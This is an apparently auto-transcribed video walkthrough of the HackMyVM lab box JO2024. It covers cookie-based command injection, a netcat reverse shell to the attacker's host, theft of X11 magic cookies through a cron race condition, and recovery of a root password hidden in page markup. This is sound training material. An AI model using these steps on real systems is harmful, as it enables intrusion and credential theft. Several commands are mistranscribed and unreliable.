Yo, what's going on, guys? In this video, we're going to be doing JO2024 from HackMyVm. This is a box about solid medium. And yeah, let's get on to the video. As always, I'm going to start by splitting my thermal serum. So running gain and discover my SR 10.0.0.1/24/IT0 grep out for PCS. Doing this, we do get that be the box 10.0.110. So I'll do Control Shift Z, so RAM map scan. So I'll do MMISSC for default scripts with information. We'll scan on ports in the IP. Doing this, I'll do my verbos. We have a total of 2 ports open, port 80 open for HTTP, and also port 22 open for SSH. I'm going to start by opening port 80. And here we do have a page for Paris 2024 Olympic Games. So it doesn't seem like we have anything under here. Also under tickets, nothing under here. So I'm going to control use source code. And nothing under here as well. So I'm going to start by doing some more enumeration, running a GoBuster. So do GoBuster dir mode minus here into the IP address. We'll do minus W for user share word list. We'll do a dirbuster directory list to medium.txt. We'll do extends to HTML, TXT, and also PHP. Looking back at mmap, we do have a total of 2 ports open. Port 22 open for SSH. This is open SSH for Debian. Port 80 open for HTTP. This is running Apache for Debian. Looking back at the GoBuster, we do have index.php and also a preferences.php. I'm sorry, using preferences.php and see what we have under here. So here we do have a personalized page. We don't have any preferences found or the cookie was expired. I'm going to refresh this and see what we do get. And once we do refresh it, we do get a language setting, which is FR. And this does seem to be under the cookie since it did mention the cookie. So I'm just going to go to inspect. I want to check what is under this cookie. We'll go into storage. We do have the name for preferences under this cookie here, right? We can start by visiting CyberChef. I do want to decode this to see what this is. I also want to open up Burp Sweep to send this request within Burp. And I believe it's going to be like base 64 or base 62. Let me just start this up. So put that in there. We'll go into from base 64. And we do see that this is base 64. You'll see that we do have the parameter followed by 15 characters for the user preferences. And that's followed by what it's specifying, right? In this case, we do have this for language, which is the string for 2 characters for FR. And I'm guessing there's going to be some command injection under here. So I'm going to go to proxy. We're going to turn this on. I'll put this into my IP address for 10.0.175. So I'm going to refresh the page here. Turn Foxy Proxy on, which we'll send this with the repeater. And you do see that when you get the source code, right? We do have the cookie and the preference as we did find within inspect. Should be matching for go to storage for the name for preference. And I'm guessing it's going to be the same thing. So I'm just going to copy this. And it should match within CyberChef, right? Yeah, it is matching. So I'm going to copy this string here. I want to put this in here. So for the language, I do want to test for command injection. We can do this for like user preference. But since language is the next one that does specify a language for FR, I do want to try an ID command for the string for 2. Since it is the shortest command, we can try. So I'll go to convert selection. We'll go to base 64 for encode. We'll check if there is www data under here. And you do see that the ID command was ran under language parameter. So under the language parameter, we can start by running commands. I just want to run a netcat. So I'll do like a netcat 10.0.0.175. We'll do this on port 9001, execute/bin/bash. I'm going to copy this command here. I'll put this within, just to know the characters. We can count them manually, but we can just echo this on the screen. We'll do echo -n. I believe we can use, we can pipe this out for I believe it's W count for N, I believe, or for N or L. It's not L, it's W count. WC. Let's do WC minus help. We can do the I'll do -m, shows for 31. So we do have the characters within the character counts. So it does seem to be the count for 31. Let's try this out. So it is for 31. I'm going to start my listener. So I'm just going to make sure that we have that. So I'm going to go to convert selection. We'll go to base 64 for encode. We send that. We do ID. And now I'm under www data. So basically we were able to get a shout through the language parameter. Make sure you do count the characters correctly. You can do this manually or using echo and WC -m for like the specified count for 31 characters, right? You can just basically encode this, and now we are under www data. So I'm going to start by running a Python 3. Well, I'm just going to run a tty shell to import pty.spawn. I do want to run a /bin/bash, /bin/bash. Now under www data, I'm going to export my term is equal to x term. Now we can clear terminals. So I'm going to start by doing some manual enumeration. I'm going to go under /var. We'll see if there's anything under backups. Nothing under backups. We'll go into www. We'll go into picture. We don't have anything under here. Would you have a pictures gallery? Let's check this out. And nothing under here. Seems like just a bunch of images. Let's go into HTML. We do have index.php, and this is what we found on GoBus, right? We can just go into images and nothing under this images. So I'm going to go under /home. We do have a user as Vanity. Play with terminals here. We do have a user.txt and also a creds. We can't cd into creds. We did get permission denied. We do have a backup, which is a file. It's not a directory. And here it does seem like we do have a file. Looking at this, I can just tell that this is going to be a race condition. The reason for that is because it is copying a file before it does do the chmod 700 for the destination file. This destination file is going to be for, it does seem like it's copying the source, or from it's copying everything from this home directory to this /backup. So I'm going to cd into a /backup, see if it does exist. I'll just run ls-la, and we do have a /backup. So it is copying the file. So let's see if we can do like a race condition or run a while true loop before it does copy this, to the destination file. So start by doing that. I'm just going to run a lreb and HackMyVm. We'll do this on 9001. We'll send that. We'll do a Python 3 for tty. We'll export the term is equal to x term. And we'll go into /backup. I want to see what kind of files are under here. We do have an X authority under there. We also have a backup. For the X authority, I do want to run a W command to see what we do have for the GUI. And we do have GUI for a session open for Vanity. So it is running a GUI for authority, X authority. I want to check if it's under Vanity, just to make sure that we do have those keys under there, or those magic cookies, and we do have X authority under there. Since we do have the X authority, it is we can actually see if backup is running as a, because we can actually run this. If we go back, if we just run backup, you'll see that we do get permission denied. I do want to see if this is running as a cron job. So we'll see needs to /dev shm. We'll get HTTP from our server to get PSPY 64. We'll go to documents privilege escalation for PSPY. We do have this for Lin. I believe I do have PSPY under Lin piece. Yeah, I do have this under here. This is for PSPY 64. We'll do chmod plus x for PSPY 64. I do want to check if this is running like every minute. If it is running every minute, we can do that while true loop, right, for that backup. So let's see what is running on this machine. Let me go back up. We have anything running? It doesn't seem like we have that running for that slash backup. It should be running this home vanity backup, and it is running it does seem like it's running every minute, right? So we can do this against home vanity backup. So let's start by doing that. I'm going to X out here and let's get another shell. I'll do a Python 3. Export my term is equal to X term. And let's go into slash backup because it is copying all the files from the home directory. I just want to see if I can cat this out, which I can't. And we do get a permission denied. So I'm going to do a while true loop. I'll just do like a while true for do. We do want to do a while true loop so it does keep going. We want to cat out anything that is from, let's go into slash home Vanity so we can check out this script. So we do want to copy anything from slash backup, and we'll output it to a like slash dev shm, right? So we'll do while true. We can cat out from slash or cat out slash backup. It's X authority. So do slash backup for the X authority. And we'll just output it to like a dev shm. We can, if we run this again, like it's going to have, there's like going to be a sequence between the time we do cat it out. So if it does like overwrite the file, we want to not overwrite it, but get all the keys. It's okay if we do get like duplicates of the keys, but it's better than erasing the whole thing. So since there's going to be like a little time gap, it's going to copy multiple times, right? So we can just not overwrite it, but just append this for writing over dev shm. We'll just do this for output.txt. We'll do this for done. So when it does run, it's going to cat out this slash backup before it does the chmod 700, or I believe it was for this before it does the permissions. Let's check out the permissions. It was chmod 700 for destination file. For this destination file, it's going to be for that slash backup. So before it does run that permission file, we can run that while true loop. And between that gap, it's going to get this backup authority, X authority. We can get the magic cookies from here. And we don't want to overwrite it, but we want to append it. So like if it does copy multiple times, it's just going to go into output.txt and we can have like duplicates. Like if you go into X authority is not really checking for, it's when you run the magic cookies, it's really not going to be checking for, or X11 to be exact. It's not going to be checking if there's duplicates within this file, right? Once you specify the variable. So it's okay if we can just have duplicates within this output.txt. So I'll do done. We'll go into slash dev shm. Let's get another shell. And we do have an output.txt for 790. If I cat out this output.txt, we do have the magic cookie. So I believe if you never worked with like magic cookies, basically we can use like X11. This is basically X11 that's running the GUI. So if I go to like X11 for hack tricks, we can specify the magic cookie. You'll see that as a magic cookie. We can set this to a XXD, but you can also use like XAuth. You don't really need use XXD for just to view them. Let's check if we do have do we have XAuth? We do have XAuth. I believe we can specify -f for the file for output.txt. If we do a list, I believe you'll see that between the loop, we did find the duplicates. So it really doesn't matter because there's like duplicates in here. We do have this for like F99. So, but it's not really strict on like doing duplicates, right? So it really doesn't matter. But we do have our keys there. We can just X out this. We could set we'll export I believe it was, let's go back here. We do have this for export. We can export the authority. Well, we'll set this to /dev shm for output.txt. So we do have that for that. Let's see if we can actually start by taking a screenshot with I believe it's on here, screenshots as well. You can also run like applications on there as well, but we don't have X11 forwarding on there, which we can double check to see if we do have. If we do have like X11 forwarding, then we can actually connect to the GUI, right, to the session. So we do have, we can get a shell, remote desktop, we can convert XWD. Let's actually copy this. We'll set the target to, so we can set the target IP, which we don't need any of this. We can set this to 0 since I just do have this from 0. So that's why I'm specifying that. If we do out smiley, we do have a screenshot XWD. So I'll start like a Python server. We'll do a Python 3 -m http.server on port 80D1. We'll get this screenshot XWD. What did we get? HTTP 10.0.0.1.110 for 80D1. We can convert the screenshot to screenshot JPEG. Open this within Firefox for screenshot. It doesn't let me tab. And here we do get a vanity for XD0. Does seem to be weird characters here. Let me just see if I can extract text from image. Let's go to browse. We'll go into locations, go to backup, HackMyVm. We'll go into JO. We'll screenshot. We convert. Because I don't want to type this whole thing out, so we can just convert this. We just have this for Vanity, and seems like it did copy this password for Vanity. So we'll do all wrap. Let's get another shell. This for Python 3. We'll switch users to Vanity. And this seemed like that is the correct password for Vanity, right? So I'm gonna export my term is equal to X term. I believe we do have SSH open, right? So we did have port 22 open, so we'll do SSH for Vanity at 10.0.0.110. We'll do yes. And now we're under Vanity. So I'm gonna start by doing a sudo mysl. We do have a user local bin for PHP server sh. I'm just gonna run this as root, see what we get. So we'll do this for root. And this starting on port 8000. So run mmap scan to see if this is actually open. 10.0.0.110. We'll do this on port 8000. And we do have HTTP open, right? We'll do 10.0.0.110 for 8000. And here we do have an Olympic athlete password leak. So it seems like a hacker claims to be obtained the password for the Olympic athlete. The hackers provide the white claims an account password as proof. It seems like the content is below and blurred. So here this is simple. We can basically just view this, where this is at. Let me lower this down. Let's go to inspect this. Let's go to edit as HTML. And we do have seems like we do have his account for lightning bolts 123 is the password for this account. And it's blurred, but you can also check this within HTML because it's just using the protected content for the class blurred, and of course for what you want to be blurred, right? So let's see if this works for roots. Let's see what other users we have on the box as well. Cat the /etc password. We'll grab out for bash. We just do have this for root. So I'm guessing root's going to be for bolts. And we can cat our root.txt. Well guys, pretty much the video. Don't forget to like and subscribe. And I'll catch you guys in the next one.